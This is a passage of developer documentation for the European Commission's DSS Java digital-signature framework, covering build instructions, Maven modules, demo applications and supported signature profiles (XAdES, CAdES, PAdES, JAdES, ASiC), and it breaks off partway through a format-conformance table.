document\n\nThis document describes some examples of how to develop in Java using the DSS framework. The aim is to show to the developers, in a progressive manner, the different uses of the framework. It will familiarize them with the code step by step.\n\n=== Scope of the document\n\nThis document provides examples of code which allow easy handling of digital signatures. The examples are consistent with the Release {dssVersion} of DSS framework which can be downloaded via https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/DSS+releases\n\nThree main features can be distinguished within the framework :\n\n * The digital signature;\n * The extension of a digital signature and;\n * The validation of a digital signature.\n \nOn a more detailed manner the following concepts and features are addressed in this document:\n \n * Formats of the signed documents: XML, JSON, PDF, DOC, TXT, ZIP...;\n * Packaging structures: enveloping, enveloped, detached and internally-detached;\n * Forms of digital signatures: XAdES, CAdES, PAdES, JAdES and ASiC-S\/ASiC-E;\n * Profiles associated to each form of the digital signature;\n * Trust management;\n * Revocation data handling (OCSP and CRL sources);\n * Certificate chain building;\n * Signature validation and validation policy;\n * Signature qualification;\n * Validation reports (Simple, Detailed, ETSI Validation report);\n * Management of signature tokens;\n * Validation of the signing certificate;\n * Timestamp creation;\n * Timestamp validation and qualification;\n * REST and SOAP webservices.\n\nThis is not an exhaustive list of all the possibilities offered by the framework and the proposed examples cover only the most useful features. However, to discover every detail of the operational principles of the framework, the JavaDoc is available within the source code.\n\nPlease note that the DSS framework is still under maintenance and new features will be released in the future.\n\n=== Abbreviations and Acronyms\n\n[cols=2]\n.Abbreviations and Acronyms\n|=======================\n|Code\t\t\t|Description\n|AdES\t\t\t|Advanced Electronic Signature\n|API\t\t\t|Application Programming Interface\n|ASiC\t\t\t|Associated Signature Containers\n|BB\t\t\t\t|Building Block (CEF)\n|CA\t\t\t\t|Certificate authority\n|CAdES\t\t\t|CMS Advanced Electronic Signatures\n|CD\t\t\t\t|Commission Decision\n|CEF\t\t\t|Connecting Europe Facility\n|CMS\t\t\t|Cryptographic Message Syntax\n|CRL\t\t\t|Certificate Revocation List\n|CSP\t\t\t|Core Service Platform (CEF)\n|CSP\t\t\t|Cryptographic Service Provider\n|DER\t\t\t|Distinguished Encoding Rules\n|DSA\t\t\t|Digital Signature Algorithm - an algorithm for public-key cryptography\n|DSI\t\t\t|Digital Service Infrastructure (CEF)\n|DSS\t\t\t|Digital Signature Service\n|EC\t\t\t\t|European Commission\n|eID\t\t\t|Electronic Identity Card\n|ESI\t\t\t|Electronic Signatures and Infrastructures\n|ETSI\t\t\t|European Telecommunications Standards Institute\n|EUPL\t\t\t|European Union Public License\n|FSF\t\t\t|Free Software Foundation\n|GS\t\t\t\t|Generic Service (CEF)\n|GUI\t\t\t|Graphical User Interface\n|HSM\t\t\t|Hardware Security Modules\n|HTTP\t\t\t|Hypertext Transfer Protocol\n|I18N\t\t\t|Internationalization\n|JAdES |JSON Advanced Electronic Signatures\n|Java EE\t\t|Java Enterprise Edition\n|JavaDoc\t\t|JavaDoc is developed by Sun Microsystems to create API documentation in HTML format from the comments in the source code. JavaDoc is an industrial standard for documenting Java classes.\n|JAXB\t\t\t|Java Architecture for XML Binding\n|JCA\t\t\t|Java Cryptographic Architecture\n|JCE\t\t\t|Java Cryptography Extension\n|JDBC\t\t\t|Java DataBase Connectivity\n|JWS\t\t\t|JSON Web Signatures\n|LGPL\t\t\t|Lesser General Public License\n|LOTL\t\t\t|List of Trusted List or List of the Lists\n|LSP\t\t\t|Large Scale Pilot\n|MIT\t\t\t|Massachusetts Institute of Technology\n|MOCCA\t\t\t|Austrian Modular Open Citizen Card Architecture; implemented in Java\n|MS \/ EUMS\t\t|Member State\n|MS CAPI\t\t|Microsoft Cryptographic Application Programming Interface\n|OCF\t\t\t|OEBPS Container Format\n|OCSP\t\t\t|Online Certificate Status Protocol\n|ODF\t\t\t|Open Document Format\n|ODT\t\t\t|Open Document Text\n|OEBPS\t\t\t|Open eBook Publication Structure\n|OID\t\t\t|Object Identifier\n|OOXML\t\t\t|Office Open XML\n|OSI\t\t\t|Open Source Initiative\n|OSS\t\t\t|Open Source Software\n|PAdES\t\t\t|PDF Advanced Electronic Signatures\n|PC\/SC\t\t\t|Personal computer\/Smart Card\n|PDF\t\t\t|Portable Document Format\n|PDFBox\t\t\t|Apache PDFBox - A Java PDF Library: http:\/\/pdfbox.apache.org\/\n|PKCS\t\t\t|Public Key Cryptographic Standards\n|PKCS#12\t\t|It defines a file format commonly used to store X.509 private key accompanying public key certificates, protected by symmetrical password\n|PKIX\t\t\t|Internet X.509 Public Key Infrastructure\n|RSA\t\t\t|Rivest Shamir Adleman - an algorithm for public-key cryptography\n|SCA\t\t\t|Signature Creation Application\n|SCD\t\t\t|Signature Creation Device\n|SME\t\t\t|Subject Matter Expert\n|SMO\t\t\t|Stakeholder Management Office (CEF)\n|SOAP\t\t\t|Simple Object Access Protocol\n|SSCD\t\t\t|Secure Signature-Creation Device\n|SVA\t\t\t|Signature Validation Application\n|TL\t\t\t\t|Trusted List\n|TLManager\t\t|Application for managing trusted lists.\n|TSA\t\t\t|Time Stamping Authority\n|TSL\t\t\t|Trust-service Status List\n|TSP\t\t\t|Time Stamp Protocol\n|TSP\t\t\t|Trusted Service Provider\n|TST\t\t\t|Time-Stamp Token\n|UCF\t\t\t|Universal Container Format\n|URI\t\t\t|Uniform Resource Identifier\n|WSDL\t\t\t|Web Services Description Language\n|WYSIWYS\t\t|What you see is what you sign\n|XAdES\t\t\t|XML Advanced Electronic Signatures\n|XML\t\t\t|Extensible Markup Language\n|ZIP\t\t\t|File format used for data compression and archiving\n|=======================\n\n=== References\n\n[%header,cols=4]\n.References\n|=======================\n|Ref.\t\t\t|Title\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t|Reference\t\t\t\t\t|Version\n|[[R01]]\tR01\t|ESI - XAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 132 part 1-2\t|1.1.1\n|[[R02]]\tR02\t|ESI - CAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 122 part 1-2\t|1.1.1\n|[[R03]]\tR03\t|ESI - PAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 142 part 1-2\t|1.1.1\n|[[R04]]\tR04\t|ESI - Associated Signature Containers (ASiC)\t\t\t\t\t\t\t\t\t|ETSI EN 319 162 part 1-2\t|1.1.1\n|[[R05]]\tR05\t|ESI - JAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI TS 119 182 part 1 \t|draft 0.0.6\n|[[R06]]\tR06\t|Document management - Portable document format - Part 1: PDF 1.7\t\t\t\t|ISO 32000-1\t\t\t\t|1\n|[[R07]]\tR07\t|Directive 1999\/93\/EC of the European Parliament and of the Council of 13 December 1999 on a Community framework for electronic signatures.\t|DIRECTIVE 1999\/93\/EC\t|\n|[[R08]]\tR08\t|Internet X.509 Public Key Infrastructure - Time-Stamp Protocol (TSP)\t\t\t|RFC 3161\t\t\t\t\t|\n|[[R09]]\tR09\t|ESI - Procedures for Creation and Validation of AdES Digital Signatures\t\t|ETSI EN 319 102-1\t\t\t|1.1.1\n|[[R10]]\tR10\t|ESI - Signature validation policy for European qualified electronic signatures\/seals using trusted lists |ETSI TS 119 172-4\t\t\t|draft\n|[[R11]]\tR11\t|ESI - Trusted Lists\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI TS 119 612\t\t |2.1.1\n|[[R12]]\tR12\t|eIDAS Regulation No 910\/2014\t\t\t\t\t\t\t\t\t\t\t\t\t|910\/2014\/EU\t\t\t |\n|[[R13]]\tR13\t|ESI - Procedures for Creation and Validation of AdES Digital Signatures\t\t|ETSI TS 119 102-2\t\t |1.2.1\n|[[R14]]\tR14\t|ESI - Procedures for using and interpreting EU Member States national trusted lists\t\t\t\t\t\t|ETSI TS 119 615\t\t |draft\n\n|=======================\n\n=== Useful links\n\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature[CEF Digital]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature+FAQ[eSignature FAQ]\n * https:\/\/webgate.ec.europa.eu\/tl-browser\/#\/[TL Browser]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature+validation+tests[eSignature validation tests]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/TLSO\/Trusted+List+Manager+non-EU[Trusted List Manager non-EU]\n * https:\/\/github.com\/esig\/dss[Source code (GitHub)]\n * https:\/\/ec.europa.eu\/cefdigital\/code\/projects\/ESIG\/repos\/dss\/browse[Source code (EC Bitbucket)]\n * https:\/\/ec.europa.eu\/cefdigital\/code\/projects\/ESIG\/repos\/dss-demos\/browse[Source code demonstrations (EC Bitbucket)]\n * https:\/\/ec.europa.eu\/cefdigital\/tracker\/projects\/DSS\/issues[Report an issue (EC Jira)]\n * https:\/\/esig-dss.atlassian.net\/projects\/DSS[Old Jira] \n\n== Build instructions\n\nThe section explains the basic steps required to successfully build the DSS components.\n\n=== DSS Core\n\nThis section explains the build and usage requirements for https:\/\/github.com\/esig\/dss[DSS framework].\n\n==== Requirements\n\nThe latest version of DSS framework has the following minimal requirements:\n\n * Java 9 and higher (tested up to Java 16) for the build is required. For usage Java 8 is a mimimum requirement;\n * Maven 3.6 and higher;\n * Memory and Disk: see minimal requirements for the used JVM. In general the higher available is better;\n * Operating system: no specific requirements (tested on Windows and Linux).\n \nNOTE: We strongly recommend using the latest available version of JDK, in order to have the latest security fixes and cryptographical algorithm updates.\n\nWARNING: Before processing the build steps, please, ensure you have successfully installed Maven and JVM with a required version.\n\n==== Adding as Maven dependency\n\nThe simplest way to include DSS to your Maven project is to add a repository into pom.xml file in the root directory of your project as following:\n\n[source,xml]\n----\n<repositories>\n\t...\n\n\t<repository>\n\t <id>cefdigital<\/id>\n\t <name>cefdigital<\/name>\n\t <url>https:\/\/ec.europa.eu\/cefdigital\/artifact\/content\/repositories\/esignaturedss\/<\/url>\n\t<\/repository>\n<\/repositories>\n----\n\nAfter that specify a list of dependencies required for your project.\n\nRefresh your project, in order to download the dependency and after you will be able to use all modules of DSS framework.\n\n==== Maven build and profiles\n\nIn order to use a customized bundle of DSS, you may want to build the DSS Core framework modules.\n\nNOTE: If you have implemented a new feature or fixed a bug issue, your pull requests are welcome at our https:\/\/github.com\/esig\/dss[GitHub Repository]\n\nA simple build of the DSS Maven project can be done with the following command:\n\n----\nmvn clean install\n----\n\nNOTE: All listed commands must be executed from the project directory via a Command Line Interface (CLI).\n\nThis installation will run all unit tests present in the modules, which can take more than one hour to do the complete build.\n\nIn addition to the general build, the framework provides a list of custom profiles, allowing a customized behavior:\n\n * quick - disables unit tests and java-doc check, in order to process the build as quick as possible (takes 2-3 minutes).\n * slow-tests - executes all tests, including time-consuming unit tests.\n * owasp - runs validation of the project and using dependencies according to the https:\/\/nvd.nist.gov[National Vulnerability Database (NVD)].\n * jdk19-plus - executed automatically for JDK version 9 and higher. Provides a support of JDK 8 with newer versions.\n * spotless - used to add a licence header into project files.\n\nWARNING: Some modules (e.g. `dss-utils`, `dss-crl-parser`, etc., see below) still have to be built completely when using the `quick` profile.\n \nIn order to run a build with a specific profile, the following command must be executed:\n\n----\nmvn clean install -P *profile_name*\n----\n\n==== Specific modules\n\nSome modules of DSS framework have a specific behavior and need to be handled accordingly.\n\nDSS contains a bundle of JAXB-based modules, generation Java classes in runtime based on XSD-schema. When any change is made in the XSD, the classes of the module are being re-generated according to the change. The following modules represent this behavior:\n\n * specs-xmldsig;\n * specs-xades;\n * specs-trusted-list;\n * specs-validation-report;\n * specs-asic-manifest;\n * specs-saml-assertion;\n * dss-policy-jaxb;\n * dss-diagnostic-jaxb;\n * dss-detailed-report-jaxb;\n * dss-simple-report-jaxb;\n * dss-simple-certificate-report-jaxb.\n\nSpecific modules with JWS and JAdES specifications exist. These modules allow to validate the generated JSON against the related JSON Schema :\n\n * specs-jws;\n * specs-jades.\n\nAlso, as it was explained in the previous section, some modules are required to be built completely for a building of their dependent modules when using a quick profile, namely:\n\n * dss-utils;\n * dss-crl-parser;\n * dss-test;\n * dss-pades;\n * dss-asic-common.\n\nThe modules contain common interfaces, used in other DSS modules, as well as unit tests to ensure the equal behavior between their implementations.\n\n==== Documentation generation\n\nIn order to generate HTML and PDF documentation for DSS project, the module `dss-cookbook` of DSS Core must be build with the following command (please, ensure that you are located in the `\/dss-cookbook` directory):\n\n----\nmvn clean install -P asciidoctor\n----\n\n==== Javadoc generation\n\nIn order to generate https:\/\/ec.europa.eu\/cefdigital\/DSS\/webapp-demo\/apidocs\/index.html[HTML Javadoc], you will need to build completely the DSS Core.\n\n[[DSSDemo]]\n=== DSS Demonstrations\n\nThis section explains the build and usage requirements for https:\/\/github.com\/esig\/dss-demonstrations[DSS Demonstration Applications].\n\n==== Requirements\n\nThe minimal requirements to build\/run DSS Demonstrations:\n\n * Java 8 and higher (tested up to Java 16) is required;\n * Maven 3.6 and higher (if build required);\n * Tomcat 8.5+ for Java 8 and Tomcat 9+ for Java 9 and higher (for Web-application);\n * Memory and Disk: see minimal requirements for the used JVM. In general the higher available is better;\n * Operating system: no specific requirements (tested on Windows and Linux).\n\n==== Maven build\n\nThe build of the project can be done similarly to DSS Core framework build with the command `mvn clean install`.\n\nPlease, ensure, that you build modules what you really need. Ignore, build failures for non-required modules.\n\n===== DSS Standalone Application\n\nIn order to build the standalone application, the following modules are required:\n\n * dss-mock-tsa;\n * dss-standalone-app;\n * dss-standalone-package.\n \nIf the build is successfull, you will be able to find out the following containers in the directory `\/dss-standalone-app-package\/target\/`:\n\n * dss-standalone-app-package-minimal.zip - contains the application code. Requires JDK ad JavaFX installed on a target machine in order to run the application;\n * dss-standalone-app-package-complete.zip - contains the application code, as well as JDK and JavaFX library code. Can be run on a machine whithout pre-installed libraries.\n\nIn order to launch the application, you will need to extract the archive and run the file `dss-run.bat`.\n\n===== DSS Web Application\n\nTo build the DSS Web Application the following modules are required:\n\n * dss-mock-tsa;\n * dss-demo-webapp;\n * dss-demo-bundle.\n \nAfter a successful build, in the directory `\/dss-demo-bundle\/target\/` you will be able to find out two containers: `dss-demo-bundle.zip` and `dss-demo-bundle.tar.gz`. Despite the container type, the content of both files is the same. After extracting the content, you will need to run the file `Webapp-Startup.bat` in order to launch the server and the file `Webapp-Shutdown.bat` to stop the server. After running the server, the web-application will be availble at the address `http:\/\/localhost:8080\/`.\n\nIf during TL\/LOTL loading you experience problems with some particular Trusted Lists, please refer the chapter <<KeyStore>> for a resolution.\n\nThe documentation and javadoc will be copied automatically from built DSS Core and available on the following addresses respectively:\n\n * HTML documentation : `http:\/\/localhost:8080\/doc\/dss-documentation.html`;\n * PDF documentation : `http:\/\/localhost:8080\/doc\/dss-documentation.pdf`;\n * Javadoc : `http:\/\/localhost:8080\/apidocs\/index.html`.\n\nIn order to build a bundle for JDK 16, the following profile can be used from `dss-demo-bundle` module:\n\n----\nmvn clean install -P java16\n----\n\nThis will create a bundle with Tomcat 9.\n\n===== Integration tests\n\nThe `dss-demo-webapp` module provides a collection of integration tests in order to test the behavior of REST\/SOAP web-services. In order to run the tests, a web-server with DSS Web Application shall be launched and the following profile need to be executed from the module:\n\n----\nmvn clean install -P run-integration-test\n----\n\n== General framework structure\n\nDSS framework is a multi-modules project which can be built with Maven.\n\n=== Maven modules\n\n==== Shared modules\n\ndss-enumerations:: Contains a list of all used enumerations in the DSS project.\ndss-alerts:: Allows configuration of triggers and handers for arbitrary defined events.\ndss-jaxb-parsers:: Contains a list of all classes used to transform JAXB objects\/strings to Java objects and vice versa.\n\n==== JAXB model modules\n\nspecs-xmldsig:: W3C XSD schema for signatures http:\/\/www.w3.org\/2000\/09\/xmldsig\nspecs-xades:: ETSI EN 319 132-1 XSD schema for XAdES.\nspecs-trusted-list:: ETSI TS 119 612 XSD schema for parsing Trusted Lists.\nspecs-validation-report:: ETSI TS 119 102-2 XSD schema for the Validation report.\nspecs-asic-manifest:: ETSI EN 319 162 schema for ASiCManifest.\nspecs-saml-assertion:: OASIS schema for SAML Assertions.\n\n'''\ndss-policy-jaxb:: JAXB model of the validation policy.\ndss-diagnostic-jaxb:: JAXB model of the diagnostic data.\ndss-detailed-report-jaxb:: JAXB model of the detailed report.\ndss-simple-report-jaxb:: JAXB model of the simple report.\ndss-simple-certificate-report-jaxb:: JAXB model of the simple report for certificates.\n\n==== JSON validation modules\n\nspecs-jws:: JSON Schemas based on the RFC 7515 specifications (not official)\nspecs-jades:: ETSI TS 119 182-1 v.0.0.6 JSON Schemas for JAdES\n\n==== Utils modules\n\ndss-utils:: API with utility methods for String, Collection, I\/O,...\ndss-utils-apache-commons:: Implementation of dss-utils with Apache Commons libraries.\ndss-utils-google-guava:: Implementation of dss-utils with Google Guava.\n\n==== i18n\n\ndss-i18n:: a module allowing internationalization of generated reports.\n\n==== Core modules\n\ndss-model:: Data model used in almost every module.\ndss-crl-parser:: API to validate CRLs and retrieve revocation data\ndss-crl-parser-stream:: Implementation of dss-crl-parser which streams the CRL.\ndss-crl-parser-x509crl:: Implementation of dss-crl-parser which uses the java object X509CRL.\ndss-spi:: Interfaces, util classes to manipulate ASN1, compute digests,... \ndss-document:: Common module to sign and validate document. This module doen't contain any implementation.\ndss-service:: Implementations to communicate with online resources (TSP, CRL, OCSP). \ndss-token:: Token definitions and implementations for MS CAPI, PKCS#11, PKCS#12.\nvalidation-policy:: Business of the signature's validation (ETSI EN 319 102 \/ TS 119 172-4).\ndss-xades:: Implementation of the XAdES signature, extension and validation.\ndss-cades:: Implementation of the CAdES signature, extension and validation.\ndss-jades:: Implementation of the JAdES signature, extension and validation.\ndss-pades:: Common code which is shared between dss-pades-pdfbox and dss-pades-openpdf.\ndss-pades-pdfbox:: Implementation of the PAdES signature, extension and validation with https:\/\/pdfbox.apache.org\/[PDFBox].\ndss-pades-openpdf:: Implementation of the PAdES signature, extension and validation with https:\/\/github.com\/LibrePDF\/OpenPDF[OpenPDF (fork of iText)].\ndss-asic-common:: Common code which is shared between dss-asic-xades and dss-asic-cades.\ndss-asic-cades:: Implementation of the ASiC-S and ASiC-E signature, extension and validation based on CAdES signatures.\ndss-asic-xades:: Implementation of the ASiC-S and ASiC-E signature, extension and validation based on XAdES signatures.\ndss-tsl-validation:: Module which allows loading \/ parsing \/ validating of LOTL and TSLs.\n\n==== WebServices\n\ndss-common-remote-dto:: Common classes between all remote services (REST and SOAP).\ndss-common-remote-converter:: Classes which convert the DTO to DSS Objects.\n\n'''\ndss-signature-dto:: Data Transfer Objects used for signature creation\/extension (REST and SOAP).\ndss-signature-remote:: Common classes between dss-signature-rest and dss-signature-soap.\ndss-signature-rest-client:: Client for the REST webservices.\ndss-signature-rest:: REST webservices to sign (getDataToSign, signDocument methods), counter-sign and extend a signature.\ndss-signature-soap-client:: Client for the SOAP webservices.\ndss-signature-soap:: SOAP webservices to sign (getDataToSign, signDocument methods), counter-sign and extend a signature.\n\n'''\ndss-server-signing-dto:: Data Transfer Objects used for the server signing module (REST and SOAP).\ndss-server-signing-common:: Common classes for server signing.\ndss-server-signing-rest:: REST webservice for server signing.\ndss-server-signing-rest-client:: REST client for server signing (sign method).\ndss-server-signing-soap:: SOAP webservice for server signing.\ndss-server-signing-soap-client:: SOAP client for server signing (sign method).\n\n'''\ndss-validation-dto:: Data Transfer Objects used for signature validation (REST and SOAP).\ndss-validation-common:: Common classes between dss-validation-rest and dss-validation-soap.\ndss-validation-rest-client:: Client for the REST signature-validation webservices.\ndss-validation-soap-client:: Client for the SOAP signature-validation webservices.\ndss-validation-rest:: REST webservices to validate a signature.\ndss-validation-soap:: SOAP webservices to validate a signature.\n\n'''\ndss-certificate-validation-dto:: Data Transfer Objects used for certificate validation (REST and SOAP).\ndss-certificate-validation-common:: Common classes between dss-certificate-validation-rest and dss-certificate-validation-soap.\ndss-certificate-validation-rest-client:: Client for the REST certificate-validation webservice.\ndss-certificate-validation-soap-client:: Client for the SOAP certificate-validation webservice.\ndss-certificate-validation-rest:: REST webservice to validate a certificate.\ndss-certificate-validation-soap:: SOAP webservice to validate a certificate.\n\n'''\ndss-timestamp-dto:: Data Transfer Objects used for timestamp creation.\ndss-timestamp-remote-common:: Common classes between dss-timestamp-remote-rest and dss-timestamp-remote-soap.\ndss-timestamp-remote-rest-client:: Client for the REST timestamp webservice.\ndss-timestamp-remote-soap-client:: Client for the SOAP timestamp webservice.\ndss-timestamp-remote-rest:: REST webservice to create a timestamp.\ndss-timestamp-remote-soap:: SOAP webservice to create a timestamp.\n\n==== Other modules\n\ndss-test:: Mocks and util classes for unit tests.\ndss-cookbook:: Samples and documentation of DSS used to generate this documentation.\n\n[[dssUtils]]\n=== DSS Utils\n\nThe module dss-utils offers an interface with utility methods to operate on String, Collection, I\/O,... DSS framework provides two different implementations with the same behaviour : \n\n * dss-utils-apache-commons : this module uses Apache Commons libraries (commons-lang3, commons-collection4, commons-io and commons-codec).\n * dss-utils-google-guava : this module only requires Google Guava (recommended on Android).\n\nIf your integration include dss-utils, you will need to select an implementation.\n\n[[dssCrlParser]]\n=== DSS CRL Parser\n\nDSS contains two ways to parse\/validate a CRL and to retrieve revocation data. An alternative to the X509CRL java object was developed to face memory issues in case of large CRLs. The X509CRL object fully loads the CRL in memory and can cause OutOfMemoryError.\n\n * dss-crl-parser-x509crl : this module uses the X509CRL java object.\n * dss-crl-parser-streams : this module offers an alternative with a CRL streaming (experimental).\n \nIf your integration require dss-crl-parser, you will need to choose your implementation.\n\n[[dssPades]]\n=== DSS PAdES\n\nSince the version 5.4, DSS allows generation\/extension\/validation PAdES signatures with two different frameworks : PDFBox and OpenPDF (fork of iText). The dss-pades module only contains the common code and requires an underlying implementation : \n \n * dss-pades-pdfbox : Supports drawing of custom text, images, as well as text+image, in a signature field.\n * dss-pades-openpdf : Supports drawing of custom text OR images in a signature field.\n\nDSS permits to override the visible signature generation with these interfaces : \n\n * eu.europa.esig.dss.pdf.IPdfObjFactory\n * eu.europa.esig.dss.pdf.visible.SignatureDrawerFactory (selects the SignatureDrawer depending on the SignatureImageParameters content)\n * eu.europa.esig.dss.pdf.visible.SignatureDrawer\n\nA new instance of the IPdfObjFactory can be created with its own SignatureDrawerFactory and injected in the padesService.setPdfObjFactory(IPdfObjFactory). By default, DSS uses an instance of ServiceLoaderPdfObjFactory. This instance checks for any registered implementation in the classpath with the ServiceLoader (potentially a service from dss-pades-pdfbox, dss-pades-openpdf or your own(s)).\n\n==== DSS PDFBox\n\nSince the version 5.5, DSS allows switching between two implementations of the framework PDFBox : default (original) and native.\n\n * Default Drawer : The original drawer implemented on the PDFBox framework, supports displaying of custom text, images, text+image combination in a signature field. The implementation does not include the provided custom text to the inner PDF structure, instead of it, the drawer creates an image representation of the provided text, which is added to the signature field (i.e. the text is not selectable and not searchable).\n * Native Drawer : Since the version 5.5, DSS includes a new implementation of PDFBox Drawer, that allows a user to add a real custom text, image or combination of text and image to a visible signature field. The native implementation embeds the provided custom text to the inner PDF structure, that makes the text selectable and searchable, and also clearer and smoother in comparison with the original implementation.\n\nBy default, DSS uses \"Default Drawer\" as the PDFBox implementation. In order to switch the implementation, that allowed in runtime, you have to set a new instance for PdfObjFactory as following:\n\n[source,java,indent=0]\n.Runtime PDF Object Factory changing\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=custom-factory]\n----\n\n== Available demonstrations\n\nWith the framework, some demonstrations are provided.\n\n[horizontal]\ndss-mock-tsa:: The class which generate false timestamps from a self-signed certificate.\nsscd-mocca-adapter:: Adapter for the MOCCA connection.\ndss-standalone-app:: Standalone application which allows signing a document with different formats and tokens (JavaFX).\ndss-standalone-app-package:: Packaging module for dss-standalone-app.\ndss-demo-webapp:: Demonstration web application which presents a part of the DSS possibilities.\ndss-demo-bundle:: Packaging module for dss-demo-webapp.\n\nWARNING: The demonstrations use a simulated timestamp service (Mock) so that is not recommended for a production usage.\n\nThe requirements and build instructions for DSS demonstrations can be found in the chapter <<DSSDemo>>.\n\n== Signature's profile simplification\n\nThe different formats of the digital signature make possible to cover a wide range of real live cases of use of this technique. Thus we distinguish the following formats: XAdES, CAdES, PAdES, JAdES and ASIC. To each one of them a specific standard is dedicated. The wide variety of options, settings and versions of the standards makes their interoperability very difficult. This is the main reason for which new standards commonly called \"baseline profiles\" were published. Their goal is to limit the number of options and variants thereby making possible a better interoperability between different actors.\n\nIn general can be said that for each format of the digital signature the number of security levels defined in the new standards has been reduced. Below is a comparative table of old and new levels for each format of the signature:\n\n[%header,cols=7*^.^]\n.Signature supported profiles\n|=======================\n2+|XAdES\t\t\t\t 2+|CAdES\t\t\t\t 2+|PAdES |JAdES\n|*STANDARD* \t |*BASELINE*\t |*STANDARD* |*BASELINE* \t |*STANDARD*\t |*BASELINE* |*BASELINE*\n|XAdES-BES \t\t.2+|XAdES-B\t |CAdES-BES \t.2+|CAdES-B \t |PAdES-BES .2+|PAdES-B .2+|JAdES-B\n|XAdES-EPES\t\t\t\t\t |CAdES-EPES\t \t\t\t |PAdES-EPES\n|XAdES-T \t\t |XAdES-T |CAdES-T \t |CAdES-T \t |PAdES-T \t |PAdES-T |JAdES-T\n|XAdES-XL \t\t |XAdES-LT \t |CAdES-XL |CAdES-LT \t |PAdES-XL \t |PAdES-LT |JAdES-LT\n|XAdES-A \t\t |XAdES-LTA\t |CAdES-A \t |CAdES-LTA \t |PAdES-LTV \t |PAdES-LTA |JAdES-LTA\n|=======================\n\nNote that the new version (v4) of the DSS framework is compatible with the baseline profiles, it is no longer possible to use the standard profiles for signing purpose. The validation of the signature still takes into account the old profiles.\n\n[.landscape]\n<<<\n\n=== Signature profile guide\n\nBelow you can find a table specifying various signature possibilities with available in DSS signature's profiles\/formats.\nThe vertical column specifies available signature profiles and their extensions. The horizontal row specifies types of documents to be signed with the formats.\n\n.File formats and Signature types conformance\n[%header,cols=\"12*^.^\"]\n|===\n 3+|Signature profiles |XML |JSON |PDF |Binary |Digest |Multiple files |Multiple signatures |Counter signature |Stand-alone timestamp\n.10+|XAdES .4+|Enveloping |Base64 encoded |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Embed XML |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Manifest |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Canonicalization |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n .4+|Enveloped |enveloped transformation |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |based on XPath |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |based on Filter2 |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Canonicalization |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Detached |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Internally Detached |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n.2+|CAdES 2+|Enveloping |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Detached |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] 